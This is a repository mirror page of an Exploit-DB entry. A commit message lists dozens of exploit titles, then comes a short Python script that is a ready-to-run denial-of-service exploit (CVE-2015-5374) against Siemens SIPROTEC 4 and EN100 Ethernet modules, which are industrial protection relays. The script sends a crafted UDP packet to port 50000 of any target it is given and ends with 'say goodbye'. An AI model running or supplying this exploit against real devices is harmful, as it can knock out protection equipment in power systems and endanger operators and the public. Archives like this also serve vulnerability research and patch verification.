bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/dos/44103.py
Offensive Security ed38447971 DB: 2018-02-17 
45 changes to exploits/shellcodes

Microsoft Edge - 'UnmapViewOfFile' ACG Bypass
JBoss Remoting 6.14.18 - Denial of Service
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service

ABRT - raceabrt Privilege Escalation(Metasploit)

Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection
Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection

Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
EPIC MyChart - SQL Injection
TV - Video Subscription - Authentication Bypass SQL Injection
UserSpice 4.3 - Blind SQL Injection
Twig < 2.4.4 - Server Side Template Injection
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting
Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection
Joomla! Component Aist 2.0 - 'id' SQL Injection
Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection
Joomla! Component DT Register 3.2.7 - 'id' SQL Injection
Joomla! Component Fastball 2.5 - 'season' SQL Injection
Joomla! Component File Download Tracker 3.0 - SQL Injection
Joomla! Component Form Maker 3.6.12 - SQL Injection
Joomla! Component Gallery WD 1.3.6 - SQL Injection
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection
Joomla! Component jGive 2.0.9 - SQL Injection
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
Joomla! Component JS Autoz 1.0.9 - SQL Injection
Joomla! Component JS Jobs 1.1.9 - SQL Injection
Joomla! Component JTicketing 2.0.16 - SQL Injection
Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
Joomla! Component NeoRecruit 4.1 - SQL Injection
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Joomla! Component Realpin 1.5.04 - SQL Injection
Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Joomla! Component Solidres 2.5.1 - SQL Injection
Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection
Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
Joomla! Component Saxum Astro 4.0.14 - SQL Injection
Joomla! Component Saxum Numerology 3.0.4 - SQL Injection
Joomla! Component SquadManagement 1.0.3 - SQL Injection
Joomla! Component Saxum Picker 3.2.10 - SQL Injection
Front Accounting ERP 2.4.3 - Cross-Site Request Forgery
PHIMS - Hospital Management Information System - 'Password' SQL Injection
PSNews Website 1.0.0 - 'Keywords' SQL Injection
Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting
2018-02-17 05:01:49 +00:00

31 lines
No EOL
1.1 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
# Date: 14.02.2018
# Exploit Author: M. Can Kurnaz
# Contact: https://twitter.com/0x43414e
# Vendor Homepage: https://www.siemens.com
# Version: All devices that include the EN100 Ethernet module version V4.24 or prior.
# Tested on: Siemens SIPROTEC 4 (multiple versions < V4.25).
# CVE : CVE-2015-5374
# Vulnerability Details:
# https://www.cvedetails.com/cve/CVE-2015-5374/
# https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 50000))
print('Done, say goodbye!')
Reference in a new issue View git blame Copy permalink